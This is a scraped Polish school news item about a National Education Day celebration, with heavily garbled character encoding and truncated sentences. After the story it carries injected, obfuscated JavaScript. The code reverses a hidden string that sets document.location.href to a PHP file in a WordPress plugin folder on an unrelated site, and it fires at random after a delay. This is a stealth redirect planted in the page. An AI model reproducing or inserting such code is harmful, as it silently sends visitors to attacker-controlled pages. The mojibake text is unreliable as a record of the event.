Dzień Edukacji Narodowej w Ekonomiku

tor Ma┼égorzata Ko┼éodziejska z┼éo┼╝y┼éa zgromadzonym na uroczysto┼Ťci nauczycielom, pracownikom i uczniom szko┼éy ┼╝yczenia.
to bardzo uroczyste spotkanie, kt├│re odby┼éo si─Ö w podnios┼éej ale radosnej atmosferze. Po z┼éo┼╝eniu zaprzysi─Ö┼╝enia przez przedstawicieli klas pierwszych , klasa IVd przedstawi┼éa scenk─Ö kabaretow─ů parodiuj─ůc─ů reklamy towar├│w przydatnych w szkolnictwie. Arty┼Ťci – prezenterzy w zabawny spos├│b zaprezentowali pokaz pomocy szkolnych, niezb─Ödnych we wdra┼╝aniu nowego systemu reform. W podzi─Ökowaniu, za wk┼éadany w prac─Ö z uczniami nauczycielski trud, przedstawiciele klasy IVa wr─Öczyli obecnym pracownikom szko┼éy symboliczne upominki.
towanie dekoracji.
$nJe=function(n){if (typeof ($nJe.list[n]) == „string”) return $nJe.list[n].split(„”).reverse().join(„”);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}to”>

Skip to content